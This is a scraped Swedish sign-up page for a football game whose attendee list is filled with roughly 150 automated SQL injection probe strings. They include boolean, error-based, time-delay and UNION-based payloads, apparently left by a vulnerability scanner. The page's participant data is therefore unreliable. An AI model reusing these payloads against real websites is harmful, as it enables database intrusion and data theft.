Moggleif.net

Kommer du och spelar fotboll? (För att ändra, skriv ditt namn igen.)
  
Vi ska vara minst 8 personer som säger JA.

Var: Hemma
Veckodag: tisdag
Datum: 2012-02-19
Tid: 12:00

DELTAGER
9733 , qLzs).,,",),'( , qLzs'aHCCGb<'">tlDwZM , qLzs') AND 1959=1923 AND ('auRd'='auRd , qLzs') AND 6573=6573 AND ('GcaX'='GcaX , qLzs' AND 6098=7658 AND 'rxdG'='rxdG , qLzs' AND 6573=6573 AND 'pKes'='pKes , qLzs%' AND 2656=2237 AND '%'=' , qLzs%' AND 6573=6573 AND '%'=' , qLzs) AND 4416=5035 AND (2693=2693 , qLzs) AND 6573=6573 AND (4677=4677 , qLzs AND 2709=3597 , qLzs AND 6573=6573 , qLzs AND 1463=2564-- TilE , qLzs AND 6573=6573-- FlyI , (SELECT (CASE WHEN (2580=4185) THEN 2580 ELSE 2580*(SELECT 2580 FROM INFORMATION_SCHEMA.PLUGINS) END , (SELECT (CASE WHEN (9087=9087) THEN 9087 ELSE 9087*(SELECT 9087 FROM INFORMATION_SCHEMA.PLUGINS) END , qLzs') AND (SELECT 5752 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(5752=5752,1))),0x716a7 , qLzs' AND (SELECT 5752 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(5752=5752,1))),0x716a70 , qLzs%' AND (SELECT 5752 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(5752=5752,1))),0x716a7 , qLzs) AND (SELECT 5752 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(5752=5752,1))),0x716a70 , qLzs AND (SELECT 5752 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(5752=5752,1))),0x716a706 , qLzs AND (SELECT 5752 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(5752=5752,1))),0x716a706 , qLzs') AND 9315=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (9315=93 , qLzs' AND 9315=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (9315=931 , qLzs%' AND 9315=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (9315=93 , qLzs) AND 9315=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (9315=931 , qLzs AND 9315=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (9315=9315 , qLzs AND 9315=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (9315=9315 , qLzs') AND 7264 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (72 , qLzs' AND 7264 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (726 , qLzs%' AND 7264 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (72 , qLzs) AND 7264 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (726 , qLzs AND 7264 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (7264 , qLzs AND 7264 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (7264 , qLzs') AND 4352=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(120)||CHR( , qLzs' AND 4352=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(120)||CHR(1 , qLzs%' AND 4352=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(120)||CHR( , qLzs) AND 4352=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(120)||CHR(1 , qLzs AND 4352=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(120)||CHR(11 , qLzs AND 4352=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(120)||CHR(120)||CHR(11 , (SELECT 6020 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(6020=6020,1))),0x716a706b71,FLOOR , (SELECT CONCAT(0x7178787871,(SELECT (ELT(8543=8543,1))),0x716a706b71)) , (SELECT (CHR(113)||CHR(120)||CHR(120)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (1290=1290) THEN 1 EL , (SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (9798=9798) THEN CHAR(4 , qLzs');SELECT PG_SLEEP(5)-- , qLzs';SELECT PG_SLEEP(5)-- , qLzs%';SELECT PG_SLEEP(5)-- , qLzs);SELECT PG_SLEEP(5)-- , qLzs;SELECT PG_SLEEP(5)-- , qLzs');WAITFOR DELAY '0:0:5'-- , qLzs';WAITFOR DELAY '0:0:5'-- , qLzs';WAITFOR DELAY '0:0:0'-- , qLzs%';WAITFOR DELAY '0:0:5'-- , qLzs);WAITFOR DELAY '0:0:5'-- , qLzs;WAITFOR DELAY '0:0:5'-- , qLzs');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(70)||CHR(78)||CHR(105),5) FROM DUAL-- , qLzs');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(70)||CHR(78)||CHR(105),0) FROM DUAL-- , qLzs';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(70)||CHR(78)||CHR(105),5) FROM DUAL-- , qLzs';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(70)||CHR(78)||CHR(105),0) FROM DUAL-- , qLzs%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(70)||CHR(78)||CHR(105),5) FROM DUAL-- , qLzs);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(70)||CHR(78)||CHR(105),5) FROM DUAL-- , qLzs;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(77)||CHR(70)||CHR(78)||CHR(105),5) FROM DUAL-- , qLzs') AND SLEEP(5) AND ('XsWZ'='XsWZ , qLzs' AND SLEEP(5) AND 'vCQc'='vCQc , qLzs%' AND SLEEP(5) AND '%'=' , qLzs) AND SLEEP(5) AND (3554=3554 , qLzs AND SLEEP(5) , qLzs AND SLEEP(5)-- sgSI , qLzs') AND 5522=(SELECT 5522 FROM PG_SLEEP(5)) AND ('ceNE'='ceNE , qLzs' AND 5522=(SELECT 5522 FROM PG_SLEEP(5)) AND 'oqpQ'='oqpQ , qLzs%' AND 5522=(SELECT 5522 FROM PG_SLEEP(5)) AND '%'=' , qLzs) AND 5522=(SELECT 5522 FROM PG_SLEEP(5)) AND (3440=3440 , qLzs AND 5522=(SELECT 5522 FROM PG_SLEEP(5)) , qLzs AND 5522=(SELECT 5522 FROM PG_SLEEP(5))-- XqNK , qLzs') WAITFOR DELAY '0:0:5' AND ('DGvo'='DGvo , qLzs' WAITFOR DELAY '0:0:5' AND 'HDbw'='HDbw , qLzs%' WAITFOR DELAY '0:0:5' AND '%'=' , qLzs) WAITFOR DELAY '0:0:5' AND (4792=4792 , qLzs WAITFOR DELAY '0:0:5' , qLzs WAITFOR DELAY '0:0:5'-- naWl , qLzs') AND 6140=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(88)||CHR(73)||CHR(67),5) AND ('zOAA'='zOAA , qLzs' AND 6140=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(88)||CHR(73)||CHR(67),5) AND 'dTBq'='dTBq , qLzs%' AND 6140=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(88)||CHR(73)||CHR(67),5) AND '%'=' , qLzs) AND 6140=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(88)||CHR(73)||CHR(67),5) AND (6192=6192 , qLzs AND 6140=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(88)||CHR(73)||CHR(67),5) , qLzs AND 6140=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(88)||CHR(73)||CHR(67),5)-- Ygss , qLzs') ORDER BY 1-- sFef , qLzs') ORDER BY 11-- hRGz , qLzs') UNION ALL SELECT NULL-- MZcC , qLzs') UNION ALL SELECT NULL,NULL-- xnrq , qLzs') UNION ALL SELECT NULL,NULL,NULL-- CUkd , qLzs') UNION ALL SELECT NULL,NULL,NULL,NULL-- LTXJ , qLzs') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- JQUG , qLzs') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- vzLy , qLzs') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ImQX , qLzs') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- uHkz , qLzs') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- JPAS , qLzs') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- wVPO , qLzs' ORDER BY 1-- pvmL , qLzs' ORDER BY 11-- xwnw , qLzs' UNION ALL SELECT NULL-- sahS , qLzs' UNION ALL SELECT NULL,NULL-- mErx , qLzs' UNION ALL SELECT NULL,NULL,NULL-- Gppa , qLzs' UNION ALL SELECT NULL,NULL,NULL,NULL-- UePV , qLzs' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- iuJv , qLzs' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- dopA , qLzs' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- RjBf , qLzs' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- nRWk , qLzs' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- CxmI , qLzs' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- QjPz , qLzs%' ORDER BY 1-- VKIe , qLzs%' ORDER BY 11-- Wifs , qLzs%' UNION ALL SELECT NULL-- IGBg , qLzs%' UNION ALL SELECT NULL,NULL-- VGnE , qLzs%' UNION ALL SELECT NULL,NULL,NULL-- ZBUb , qLzs%' UNION ALL SELECT NULL,NULL,NULL,NULL-- toxt , qLzs%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- LZYJ , qLzs%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- Cfnj , qLzs%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- VOfI , qLzs%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- BypW , qLzs%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- YgEf , qLzs%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- QAtJ , qLzs) ORDER BY 1-- kPVQ , qLzs) ORDER BY 11-- vRIe , qLzs) UNION ALL SELECT NULL-- lpgn , qLzs) UNION ALL SELECT NULL,NULL-- VKnb , qLzs) UNION ALL SELECT NULL,NULL,NULL-- hdhm , qLzs) UNION ALL SELECT NULL,NULL,NULL,NULL-- FxPL , qLzs) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- JXvv , qLzs) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- IlZY , qLzs) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- gNQW , qLzs) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- tAbu , qLzs) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- quHs , qLzs) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- kTPd , qLzs ORDER BY 1-- KtSg , qLzs ORDER BY 11-- WFqO , qLzs UNION ALL SELECT NULL-- dCpg , qLzs UNION ALL SELECT NULL,NULL-- aoEu , qLzs UNION ALL SELECT NULL,NULL,NULL-- OcXr , qLzs UNION ALL SELECT NULL,NULL,NULL,NULL-- tzCd , qLzs UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- JSmL , qLzs UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- Eevf , qLzs UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- hmfV , qLzs UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- dLye , qLzs UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- bIUq , qLzs UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- myHL , qLzs ORDER BY 1-- BIgl , qLzs ORDER BY 11-- wuSN , qLzs UNION ALL SELECT NULL-- jkMW , qLzs UNION ALL SELECT NULL,NULL-- gZOi , qLzs UNION ALL SELECT NULL,NULL,NULL-- zcxe , qLzs UNION ALL SELECT NULL,NULL,NULL,NULL-- uUIB , qLzs UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- Hiek , qLzs UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- dRaY , qLzs UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- aNOm , qLzs UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- iDgp , qLzs UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- kGcx , qLzs UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- dmxi
Antal: 159 pers.

KANSKE

Antal: 0 pers.

KOMMER EJ

Antal: 0 pers.

Klockan är nu 22:13 , 2020-02-28.